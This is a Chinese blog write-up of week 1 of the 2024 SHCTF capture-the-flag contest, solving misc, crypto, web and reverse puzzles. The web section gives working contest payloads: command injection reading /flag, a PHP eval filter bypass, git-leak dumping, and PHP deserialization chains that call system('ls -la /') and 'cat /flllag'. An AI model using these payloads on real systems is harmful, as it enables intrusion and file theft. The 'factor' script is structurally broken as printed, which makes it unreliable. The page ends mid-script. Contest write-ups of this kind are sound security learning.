
<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="utf-8" />
    <title>2024 SHCTF-Week1 个人wp | 泉子yeah的博客</title>
    <meta name="author" content="泉子yeah" />
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta
        name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"
    />
    <link rel="icon" href="/images/avatar.jpg" />
    <link rel="preconnect" href="https://s4.zstatic.net" />
<script src="https://s4.zstatic.net/ajax/libs/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://s4.zstatic.net/ajax/libs/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.googleapis.cn" />
<link rel="preconnect" href="https://fonts.gstatic.cn" crossorigin />
<link
    rel="stylesheet"
    href="https://fonts.googleapis.cn/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap"
/>
<script> const mixins = {}; </script>

<script src="https://polyfill.alicdn.com/v3/polyfill.min.js?features=default"></script>


<script src="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<script src="https://s4.zstatic.net/ajax/libs/highlightjs-line-numbers.js/2.8.0/highlightjs-line-numbers.min.js"></script>
<link
    rel="stylesheet"
    href="https://s4.zstatic.net/ajax/libs/highlight.js/11.9.0/styles/github.min.css"
/>
<script src="/js/lib/highlight.js"></script>



<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.3.0"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/loading.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>泉子YEAH的博客</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;泉子YEAH的博客</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>2024 SHCTF-Week1 个人wp</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2024/11/8
        </span>
        
        
        <span class="tags">
            <span class="icon">
                <i class="fa-solid fa-tags fa-fw"></i>
            </span>
            
            
            <span class="tag">
                
                <a href="/tags/2024-SHCTF/" style="color: #ff7d73">
                    2024 SHCTF
                </a>
            </span>
            
        </span>
        
    </div>
    
    <div class="content" v-pre>
        <h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h3 id="签到题"><a href="#签到题" class="headerlink" title="签到题"></a>签到题</h3><h4 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h4><p>在公众号上签到即可。</p>
<img src="/images/0.jpg" style="zoom:25%;" />



<h3 id="拜师之旅①"><a href="#拜师之旅①" class="headerlink" title="拜师之旅①"></a>拜师之旅①</h3><h4 id="解题思路-1"><a href="#解题思路-1" class="headerlink" title="解题思路"></a>解题思路</h4><p>打开图片发现为png格式且损坏，于是使用010以16进制格式打开，发现缺少png格式固有的文件头和文件尾。将文件头文件尾补充完整后可以正常打开图片，但并未找到flag。意识到图片尺寸可能经过修改，于是在010中将图片的高修改为更大值。</p>
<p><img src="/images/1.png"></p>
<p>之后再次打开图片得到flag。</p>
<p><img src="/images/2.png"></p>
<h4 id="走过的弯路"><a href="#走过的弯路" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>添加png格式文件头时直接在原码上改了，导致更改了IHDR块，让图片无法打开。检查了很久才发现这个问题，还以为我思路搞错了。</p>
<h3 id="Rasterizing-Traffic"><a href="#Rasterizing-Traffic" class="headerlink" title="Rasterizing Traffic"></a>Rasterizing Traffic</h3><h4 id="解题思路-2"><a href="#解题思路-2" class="headerlink" title="解题思路"></a>解题思路</h4><p>给出的文件是pcapng文件，故使用wireshark打开，http检索到3个txt文件和一个png文件。</p>
<p><img src="/images/3.png"></p>
<p>由于题目名称本身给出的提示，意识到这道题可能是图片隐写的光栅题，于是导出png文件。</p>
<p><img src="/images/4.png"></p>
<p>从github上找到光栅题脚本，使用脚本切割出光栅图像得到flag。</p>
<p>脚本链接：<a target="_blank" rel="noopener" href="https://github.com/AabyssZG/Raster-Terminator">https://github.com/AabyssZG/Raster-Terminator</a></p>
<p><img src="/images/4-1.png"></p>
<p><img src="/images/4-2.png" alt="4-2"></p>
<p><img src="/images/4-3.png" alt="4-3"></p>
<p><img src="/images/4-4.png" alt="4-4"></p>
<p><img src="/images/4-5.png" alt="4-5"></p>
<h4 id="走过的弯路-1"><a href="#走过的弯路-1" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>wireshark打开后会得到很多无用的文件，比如flag1-3.txt，容易被误导。同时得到光栅图片后不知道怎么操作，甚至以为是条形码。在使用脚本解题时脚本还出现了bug，花费了很多时间。</p>
<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h3 id="Hello-Crypto"><a href="#Hello-Crypto" class="headerlink" title="Hello Crypto"></a>Hello Crypto</h3><h4 id="解题思路-3"><a href="#解题思路-3" class="headerlink" title="解题思路"></a>解题思路</h4><p>题目提示flag通过bytes_to_long函数得到了m的值，故可以将给出的m的值用long_to_bytes函数转化回字节。</p>
<p><img src="/images/c-1.png"></p>
<h4 id="走过的弯路-2"><a href="#走过的弯路-2" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>将m的值当成一个特定的密码类型，用各种各样的解码方式解了很久。</p>
<h4 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h4><pre><code class="python">from Crypto.Util.number import long_to_bytes

m=215055650564999508004097327321867028726614118260571243210304740818195843578574047754275626488618033715453140576957301535613

flag_bytes = long_to_bytes(m)

print(&quot;flag =&quot;, flag_bytes.decode())
</code></pre>
<h3 id="EzAES"><a href="#EzAES" class="headerlink" title="EzAES"></a>EzAES</h3><h4 id="解题思路-4"><a href="#解题思路-4" class="headerlink" title="解题思路"></a>解题思路</h4><p>以AES解码方式解码即可。</p>
<p><img src="/images/c-2.png"></p>
<h4 id="走过的弯路-3"><a href="#走过的弯路-3" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>写代码的时候错了好几次。</p>
<h4 id="代码-1"><a href="#代码-1" class="headerlink" title="代码"></a>代码</h4><pre><code class="python">from Crypto.Cipher import AES
import os

key = b&#39;\xf5\xeck^\xb9\xeb!H&amp;N\xbb)\xbb\xfa\x982&#39; 
iv = b&#39;C\x7fgK]=\x19\xbb\xc7@\x7ft\xdc\t\x9f\xed&#39; 
ciphertext=b&#39;\xf5w\x1ac4\x14\x10\x9ds\x11\xdf&#123;\xbboa3k|]M\xbe\x05\x86\xc9\x08#\x0f\xea\xb6\xa3\x97\xe4\xd6*\xc0\x82(\tL\x8e\x08\xf0\xbf\xd6xRU\xe3&#39; 

my_aes = AES.new(key, AES.MODE_CBC, iv)

decrypted = my_aes.decrypt(ciphertext)

decrypted = decrypted.rstrip(b&#39; &#39;)

print(decrypted)
</code></pre>
<h3 id="factor"><a href="#factor" class="headerlink" title="factor"></a>factor</h3><h4 id="解题思路-5"><a href="#解题思路-5" class="headerlink" title="解题思路"></a>解题思路</h4><p>代码要求先将N分解质因数，然后从10个质因数里选择7个质因数以找到符合条件的n，最后解出m以得到flag。故将N使用alpertron分解为10个质因数。</p>
<p>alpertron链接：<a target="_blank" rel="noopener" href="https://www.alpertron.com.ar/ECM.HTM">https://www.alpertron.com.ar/ECM.HTM</a></p>
<p><img src="/images/7-0.png"></p>
<p>最后遍历10个质因数选择7个质因数的所有结果，一一尝试得到有意义的flag。</p>
<p><img src="/images/c-3.png"></p>
<h4 id="走过的弯路-4"><a href="#走过的弯路-4" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>分解质因数很难…而且写代码的时候出现了遍历之后没找到有意义flag的情况，重新写了好几遍代码…</p>
<h4 id="代码-2"><a href="#代码-2" class="headerlink" title="代码"></a>代码</h4><pre><code class="python">from itertools import combinations
from Crypto.Util.number import inverse, long_to_bytes

prime_list = [
    9303199043268102397,
    11109019029619180277,
    11575414628268275699,
    11684023965079139771,
    11867637349987912109,
    12147365055978187691,
    12677707289529295337,
    15274164577379776751,
    16402671077917077127,
    17694995428155025259
]

e = 65537
c=32647863290677112688754981821412637474017869682051939034131849229623784639477450570598410764937205285591806558674895348682242779044170

def prod(iterable):
    result = 1
    for num in iterable:
        result *= num
    return result

for p_list in combinations(prime_list, 7):
    n = prod(p_list)

phi_n = prod([p - 1 for p in p_list])

d = inverse(e, phi_n)

m = pow(c, d, n)

try:
    flag = long_to_bytes(m)
    if b&#39;CTF&#123;&#39; in flag:  
        print(f&quot;Found flag: &#123;flag&#125;&quot;)
        break
except:
    continue
</code></pre>
<h3 id="baby-mod"><a href="#baby-mod" class="headerlink" title="baby_mod"></a>baby_mod</h3><h4 id="解题思路-6"><a href="#解题思路-6" class="headerlink" title="解题思路"></a>解题思路</h4><p>题目提示模，于是根据给出的条件leak&#x3D;p×r-q×t-tmp，通过模运算推导关系。条件为：</p>
<p>leak&#x3D;p×r−q×t−tmp</p>
<p>可整理为：</p>
<p>p×r−q×t&#x3D;leak+tmp</p>
<p>对方程的两边取模t：</p>
<p>(p×r−q×t) modt&#x3D;(leak+tmp) modt</p>
<p>由于q×t modt&#x3D;0（因为q×t是t的倍数，模t为 0），可简化为：</p>
<p>(p×r) modt&#x3D;(leak+tmp) modt</p>
<p>由于r和t互质，可以通过将两边除以r来简化：</p>
<p>p≡ (leak+tmp)&#x2F;r modt</p>
<p>同理可以得到q≡-(leak+tmp)&#x2F;r modt。</p>
<p>由于tmp只是15位的素数，所以可以考虑遍历tmp，检验得到的p、q是否满足512位素数的条件。</p>
<p><img src="/images/c-4.1.png"></p>
<p>得到p、q后解出flag。</p>
<p><img src="/images/c-4.png"></p>
<h4 id="走过的弯路-5"><a href="#走过的弯路-5" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>思路很难想，一开始想遍历所有512位素数得到p、q，实际操作发现不可行。（主要是一开始也没想到提示的“模”是这么用的）</p>
<h4 id="代码-3"><a href="#代码-3" class="headerlink" title="代码"></a>代码</h4><pre><code class="python">from Crypto.Util.number import getPrime, isPrime, inverse
#遍历tmp，寻找p、q

leak = 2805589479561063271634034839975734792004537331447039838969167517026809513712389395655167348625357088200527197608059266264449495851807771533673343801578739958388074839484845230961478029162126365537764209740649474394309116948394249297008658469535016970921621475310277490100874445435774386491421973038054314998847854969449655995234992461922466998772183485365526893424352066675287489123109801
r = 738188666513120845034449468158723654105415738876021626515357830908229992319275985393434641122520481479535525400397189445467512696550171769989053239148605286626708343542258195939740726270661490796424657682041790762381689449589476625149
t = 794103648051300070201128677942726620543928166005218709713136717455564649434598489289357024806746692576613391709966060991476317960641287607284626643325881565523551669698236969212088064371526471512164355470780063039201734822083269079089

def validate_prime(p, q):
    return isPrime(p) and isPrime(q) and p.bit_length() == 512 and q.bit_length() == 512

for tmp in range(2**14, 2**15):  
    p_mod_t = ((leak + tmp) % t) * inverse(r, t) % t
    q_mod_r = (-leak - tmp) * inverse(t, r) % r
    p_candidate = p_mod_t
    q_candidate = q_mod_r
    if validate_prime(p_candidate, q_candidate):
        print(f&quot;Found p = &#123;p_candidate&#125;, q = &#123;q_candidate&#125;, tmp = &#123;tmp&#125;&quot;)
        break
</code></pre>
<pre><code class="python">from Crypto.Util.number import inverse, long_to_bytes
#解密flag

p = 11915308152351634578833813708479126407591812470439611602692694739068629624798364690288416072262523723079713116781628769966300803405398376892045391001890213
q = 7543292328672611995111707410722943417013158467615431603784525718913285231125094491104624043481811399820051890929167673571267468621747098600539446583426477
tmp = 17483
n = p * q
c=49738505703825961625799761741401997580456327493315470056188521049633822354938689959817893638245039717379598334547399111258258021832240238995786042708390955708355552752110154448039409169146064244749840019926732469235099824894821396296913113303825145861348830916348585349070510246903803566678617010980848106451
e = 65537

phi_n = (p - 1) * (q - 1)
d = inverse(e, phi_n)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(&quot;Flag:&quot;, flag.decode())
</code></pre>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h3 id="单身十八年的手速"><a href="#单身十八年的手速" class="headerlink" title="单身十八年的手速"></a>单身十八年的手速</h3><h4 id="解题思路-7"><a href="#解题思路-7" class="headerlink" title="解题思路"></a>解题思路</h4><p>从网页源代码中得到一串密码。</p>
<p><img src="/images/5.png"></p>
<p>将其用Base64解码后得到flag。</p>
<p><img src="/images/5-1.png"></p>
<h4 id="走过的弯路-6"><a href="#走过的弯路-6" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>直接将密码当作flag提交，发现错误，然后意识到没有那么简单。</p>
<h3 id="ez-gittt"><a href="#ez-gittt" class="headerlink" title="ez_gittt"></a>ez_gittt</h3><h4 id="解题思路-8"><a href="#解题思路-8" class="headerlink" title="解题思路"></a>解题思路</h4><p>F12查看源代码提示flag在git中。</p>
<p><img src="/images/6.png"></p>
<p>发现可以直接访问.git，于是可知git泄露。</p>
<p><img src="/images/6-1.png"></p>
<p>从github上找到githack，使用githack拷贝了泄露的git代码，通过git log复现。</p>
<p>脚本链接：<a target="_blank" rel="noopener" href="https://github.com/0wnerDied/GitHackPro">https://github.com/0wnerDied/GitHackPro</a></p>
<p><img src="/images/6-2.png"></p>
<p>可以发现有个add_flag的命令，从而能找到移除的flag。</p>
<p><img src="/images/6-3.png"></p>
<h4 id="走过的弯路-7"><a href="#走过的弯路-7" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>找不到适配版本的githack。第一次使用的githack只拷贝了index文档，让我觉得思路错了，做了很久…后来才发现是使用的githack出现了bug。</p>
<h3 id="1zflask"><a href="#1zflask" class="headerlink" title="1zflask"></a>1zflask</h3><h4 id="解题思路-9"><a href="#解题思路-9" class="headerlink" title="解题思路"></a>解题思路</h4><p>题目提示robots.txt，故进入&#x2F;robots.txt得到提示&#x2F;s3recttt。</p>
<p><img src="/images/7.png"></p>
<p>进入后得到app.py文件。阅读代码可知存在&#x2F;api，且 通过SSHCTFF的参数可以进行命令。</p>
<p><img src="/images/7-1.png"></p>
<p>&#x2F;api之后得知根目录中存在flag文件。</p>
<p><img src="/images/7-2.png"></p>
<p>于是使用&#x2F;api?SSHCTFF&#x3D;cat%20&#x2F;flag命令得到flag。</p>
<p><img src="/images/7-3.png"></p>
<h4 id="走过的弯路-8"><a href="#走过的弯路-8" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>在最后一步时一直找不到flag，甚至以为根目录的flag是空的。以为flag被隐藏或被删除，甚至查看了log文件。</p>
<h3 id="jvav"><a href="#jvav" class="headerlink" title="jvav"></a>jvav</h3><h4 id="解题思路-10"><a href="#解题思路-10" class="headerlink" title="解题思路"></a>解题思路</h4><p>网页要求提交代码到服务器并执行，给出提示写java代码以获得flag。于是使用java代码查询根目录，发现的确存在flag。</p>
<p><img src="/images/8.png"></p>
<p>于是继续使用java代码读取文件得到flag。</p>
<p><img src="/images/8-1.png"></p>
<h4 id="走过的弯路-9"><a href="#走过的弯路-9" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>就写了一个hello world程序，以为只要运行成功就能得到flag了…然后卡了很久不知道怎么办，甚至去看网页源代码…而且类定义名称必须为demo，是个隐藏条件。</p>
<h4 id="代码-4"><a href="#代码-4" class="headerlink" title="代码"></a>代码</h4><pre><code class="java">import java.io.File;
import java.nio.file.Files;
import java.nio.file.Paths;

public class demo &#123;
    public static void main(String[] args) &#123;
        try &#123;
            String content = new String(Files.readAllBytes(Paths.get(&quot;/flag&quot;)));
            System.out.println(content);
        &#125; catch (Exception e) &#123;
            e.printStackTrace();
        &#125;
    &#125;
&#125;
</code></pre>
<h3 id="蛐蛐？蛐蛐！"><a href="#蛐蛐？蛐蛐！" class="headerlink" title="蛐蛐？蛐蛐！"></a>蛐蛐？蛐蛐！</h3><h4 id="解题思路-11"><a href="#解题思路-11" class="headerlink" title="解题思路"></a>解题思路</h4><p>在网页源代码中得到提示，source.txt中存在源码。</p>
<p><img src="/images/9.png"></p>
<p>通过访问&#x2F;source.txt，可以得到提示。POST中的ququ参数如果不为空，且以ququk1开头，代码将执行该参数中的php代码，即eval命令，这是一个可以利用的漏洞。但有前提条件：需要ququ&#x3D;114514但ququ的反转字符不等于415411，这看似是不可能达成的条件。</p>
<p><img src="/images/9-1.png"></p>
<p>设法绕过这个if判断时，意外发现让ququ&#x3D;114514&#x2F;1时，判断为真，输出了蛐蛐成功第一步。意识到可以通过这种方法通过if判断。</p>
<p><img src="/images/9-2.png"></p>
<p>于是尝试通过eval命令查询根目录，成功发现了flag。</p>
<p><img src="/images/9-3.png"></p>
<p>最后成功得到了flag的内容。</p>
<p><img src="/images/9-4.png"></p>
<h4 id="走过的弯路-10"><a href="#走过的弯路-10" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>找到代码漏洞很难，通过if判断很难，输入代码查询根目录和flag也很难，一开始不知道怎么做也很难…</p>
<h3 id="poppopop"><a href="#poppopop" class="headerlink" title="poppopop"></a>poppopop</h3><h4 id="解题思路-12"><a href="#解题思路-12" class="headerlink" title="解题思路"></a>解题思路</h4><p>根据提示，构造pop链以触发flag()中的命令。可以通过T类对象的销毁，设置 SH::$Web &#x3D; true。之后通过F类的 _toString()触发 SHCTF的__invoke()方法。在 _invoke() 方法中，SH::$Web 为真，从而调用 C::flag()。从而可以设置以下pop链：</p>
<p>T 对象用于设置 SH::$Web &#x3D; true</p>
<p>F 对象用于调用 C 类的 flag() 方法。</p>
<p>C 对象的 $p 属性需要是一个 SHCTF 对象，确保触发 SHCTF::__invoke()。</p>
<p>将写好的php代码用base64编码，再传递给服务器，即可执行命令。首先先查看服务器的所有文件，可以找到flllag文件存在。</p>
<p><img src="/images/10.png"></p>
<p>之后查看flllag的内容，成功得到flag。</p>
<p><img src="/images/10-1.png"></p>
<h4 id="走过的弯路-11"><a href="#走过的弯路-11" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>首先是php代码构造不出来，payload不知道怎么写。然后是命令要用system命令，一直不知道用什么类型的命令。根目录下还只有index.php，要检索所有文件才能看到flag，花费了非常长的时间。</p>
<h4 id="代码-5"><a href="#代码-5" class="headerlink" title="代码"></a>代码</h4><pre><code class="php">&lt;?php
//用于列出所有文件，已省略类定义部分
$shctf = new SHCTF();
$shctf-&gt;isyou = &#39;system&#39;; 
$shctf-&gt;flag = &#39;ls -la /&#39;; 

$c = new C();
$c-&gt;p = $shctf; 

$f = new F();
$f-&gt;o = $c; 

$t = new T();
$t-&gt;n = $f; 

echo base64_encode(serialize($t));
?&gt;
//base64编码结果：TzoxOiJUIjoxOntzOjE6Im4iO086MToiRiI6MTp7czoxOiJvIjtPOjE6IkMiOjE6e3M6MToicCI7Tzo1OiJTSENURiI6Mjp7czo1OiJpc3lvdSI7czo2OiJzeXN0ZW0iO3M6NDoiZmxhZyI7czo4OiJscyAtbGEgLyI7fX19fQ==
</code></pre>
<pre><code class="php">&lt;?php
//用于查看flag，已省略类定义部分
$shctf = new SHCTF();
$shctf-&gt;isyou = &#39;system&#39;; 
$shctf-&gt;flag = &#39;cat /flllag&#39;; 

$c = new C();
$c-&gt;p = $shctf; 

$f = new F();
$f-&gt;o = $c; 

$t = new T();
$t-&gt;n = $f; 

echo base64_encode(serialize($t));
?&gt;
//base64编码结果：TzoxOiJUIjoxOntzOjE6Im4iO086MToiRiI6MTp7czoxOiJvIjtPOjE6IkMiOjE6e3M6MToicCI7Tzo1OiJTSENURiI6Mjp7czo1OiJpc3lvdSI7czo2OiJzeXN0ZW0iO3M6NDoiZmxhZyI7czoxMToiY2F0IC9mbGxsYWciO319fX0=
</code></pre>
<h3 id="MD5-Master"><a href="#MD5-Master" class="headerlink" title="MD5 Master"></a>MD5 Master</h3><h4 id="解题思路-13"><a href="#解题思路-13" class="headerlink" title="解题思路"></a>解题思路</h4><p>根据源代码，需要找到两个字符串master1和master2。确保MD5 Master! 加上这两个字符串后内容不同，但哈希值相同。于是进行fastcoll碰撞，生成两个前缀相同的字符串，它们均为16进制编码。</p>
<p>MD5在线碰撞链接：<a target="_blank" rel="noopener" href="https://rivers.chaitin.cn/tools/md5fastcollision">https://rivers.chaitin.cn/tools/md5fastcollision</a></p>
<p><img src="/images/11-0.png"></p>
<p>之后将碰撞得到的16进制字符串转化为原始字符串，再去掉前缀MD5 Master! ，就是需要寻找的master1和master2。将master1和master2发送给服务器，即可得到flag。</p>
<p><img src="/images/11.png"></p>
<h4 id="走过的弯路-12"><a href="#走过的弯路-12" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>一开始想的太简单了，没注意到三等号，以为让哈希值都为0e开头就行，结果一直失败。然后寻找如何碰撞得到前缀相同的字符串也很困难，最后尝试发送得到的master1和master2时也失败了很多次，不知道该以什么形式发送，花了很长的时间。</p>
<h4 id="代码-6"><a href="#代码-6" class="headerlink" title="代码"></a>代码</h4><pre><code class="php">&lt;?php
function hexToStr($hex) &#123;
    $str = &#39;&#39;;
    for ($i = 0; $i &lt; strlen($hex); $i += 2) &#123;
        $str .= chr(hexdec($hex[$i] . $hex[$i + 1]));
    &#125;
    return $str;
&#125;

$collisionText1=&quot;4d4435206d6173746572210000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000557a42e47955f4e430e1191ee34e91e818f673992cabeabc23f236c6d327b8ce54aaf0c0fb658abf6b5c5602c42ba88c235f89f142fdcc556d6befa651091866a7b40018ed0b7a1686e85b9e76eb437757427d96f2d0b07e86ff9f4f5f51c7c19d90c40d04cb7a365a8ee750490c5f2989fc679d3b16caeb6af3ae33668d7420&quot;;
$collisionText2=&quot;4d4435206d6173746572210000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000557a42e47955f4e430e1191ee34e91e818f673192cabeabc23f236c6d327b8ce54aaf0c0fb658abf6b5c5602c4aba88c235f89f142fdcc556d6bef2651091866a7b40018ed0b7a1686e85b9e76eb437757427d16f2d0b07e86ff9f4f5f51c7c19d90c40d04cb7a365a8ee750498c5e2989fc679d3b16caeb6af3aeb3668d7420&quot;;

$master1Hex = $collisionText1;
$master2Hex = $collisionText2;

$master1 = hexToStr($master1Hex);
$master2 = hexToStr($master2Hex);

$prefixLength = strlen(&quot;MD5 master!&quot;);
$master1 = substr($master1, $prefixLength);
$master2 = substr($master2, $prefixLength);

function sendPostRequest($master1, $master2) &#123;
    $url = &#39;http://entry.shc.tf:23212/&#39;;
    $data = array(
        &#39;master1&#39; =&gt; $master1,
        &#39;master2&#39; =&gt; $master2
    );

    $options = array(
        &#39;http&#39; =&gt; array(
            &#39;header&#39;  =&gt; &quot;Content-type: application/x-www-form-urlencoded\r\n&quot;,
            &#39;method&#39;  =&gt; &#39;POST&#39;,
            &#39;content&#39; =&gt; http_build_query($data),
        ),
    );

    $context  = stream_context_create($options);
    $result = file_get_contents($url, false, $context);
    return $result;
&#125;

$response = sendPostRequest($master1, $master2);
echo $response;
?&gt;
</code></pre>
<h1 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h1><h3 id="gamegame"><a href="#gamegame" class="headerlink" title="gamegame"></a>gamegame</h3><h4 id="解题思路-14"><a href="#解题思路-14" class="headerlink" title="解题思路"></a>解题思路</h4><p>打开exe文件后发现是个数独题，解出数独后填入52个数字，正确后显示flag is your input，从而得到flag。</p>
<p><img src="/images/9.jpg"></p>
<h4 id="走过的弯路-13"><a href="#走过的弯路-13" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>试着拿ida分析程序（但这应该是正经做法？），但是意外发现直接解数独好像也行，通过录像逐帧查看可以看到exe程序退出前的显示页面，得到flag就是输入数字的提示。</p>
<h3 id="ezxor"><a href="#ezxor" class="headerlink" title="ezxor"></a>ezxor</h3><h4 id="解题思路-15"><a href="#解题思路-15" class="headerlink" title="解题思路"></a>解题思路</h4><p>用ida打开exe文件，之后找到main函数的位置。查看伪代码可知存在26位字符，通过对这26个字符进行操作而得出结果。可以推测将v9和v10合并之后正好是我们需要还原的数据，因为正好满足26位字符的条件。</p>
<p><img src="/images/12-1.png"></p>
<p>分析伪代码可知，这个循环对输入的 v8 数组进行了解密，主要使用了异或运算：</p>
<p>如果 j % 3 &#x3D;&#x3D; 1，则 v8[j] ^&#x3D; 0x21u，</p>
<p>如果 j % 3 &#x3D;&#x3D; 2，则 v8[j] ^&#x3D; 0x31u，</p>
<p>否则，v8[j] ^&#x3D; 0x90u。</p>
<p><img src="/images/12-2.png"></p>
<p>可以通过进行相同的异或操作以得到原始数据，从而还原出flag。于是提取出这26个字符，通过相同的异或操作，得到flag。</p>
<p><img src="/images/12-0.png"></p>
<h4 id="走过的弯路-14"><a href="#走过的弯路-14" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>以为v10是另一个通过不同异或加密得到的数组，一直在找第二个加密方式。后来发现是16位，正好和v9合并在一起是26位，应该可以一起解密。</p>
<h4 id="代码-7"><a href="#代码-7" class="headerlink" title="代码"></a>代码</h4><pre><code class="python">v9 = [-61, 105, 114, -60, 103, 74, -24, 17, 67, -49]
v10 = [111, 0, -13, 68, 110, -8, 89, 73, -24, 78, 94, -30, 83, 67, -79, 92]

v9 = [(x &amp; 0xFF) for x in v9]
v10 = [(x &amp; 0xFF) for x in v10]

v_combined = v9 + v10

def decrypt(data):
    for j in range(len(data)):
        if j % 3 == 1:
            data[j] ^= 0x21
        elif j % 3 == 2:
            data[j] ^= 0x31
        else:
            data[j] ^= 0x90
    return data

decrypted = decrypt(v_combined)

decrypted_string = &#39;&#39;.join([chr(x) for x in decrypted])
print(decrypted_string)
</code></pre>
<h3 id="ezapk"><a href="#ezapk" class="headerlink" title="ezapk"></a>ezapk</h3><h4 id="解题思路-16"><a href="#解题思路-16" class="headerlink" title="解题思路"></a>解题思路</h4><p>用jadx打开apk文件，发现main函数中名为key的内容。</p>
<p>脚本链接：<a target="_blank" rel="noopener" href="https://github.com/skylot/jadx">https://github.com/skylot/jadx</a></p>
<p><img src="/images/13-1.png"></p>
<p>通过分析代码，可得到代码逻辑：</p>
<p>对输入字符串的每个字符与key进行异或操作，</p>
<p>将结果加上6并乘以2进行进一步变换，</p>
<p>最终结果被编码为Base64字符串并返回，</p>
<p>将加密结果与一个已知的Base64字符串进行比较woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg&#x3D;&#x3D;。</p>
<p>通过解密该Base64编码字符串，然后还原出原始的输入字符串，就可以得到需要输入的字符串，即flag。</p>
<p><img src="/images/13-0.png"></p>
<h4 id="走过的弯路-15"><a href="#走过的弯路-15" class="headerlink" title="走过的弯路"></a>走过的弯路</h4><p>尝试用ida打开apk文件，发现不能查看伪代码。之后改用jadx打开，分析代码较难。</p>
<h4 id="代码-8"><a href="#代码-8" class="headerlink" title="代码"></a>代码</h4><pre><code class="python">import base64

key = [12, 15, 25, 30, 36]

encoded_string = &quot;woLDgMOgw7hEwoJQw7zDtsKow7TDpMOMZMOow75QxIbDnsKmw6Z4UMK0w7rCklDCrMKqwqbDtMOOw6DDsg==&quot;

decoded_bytes = base64.b64decode(encoded_string)
decoded_string = decoded_bytes.decode(&#39;utf-8&#39;)

def decode(encoded_str, key):
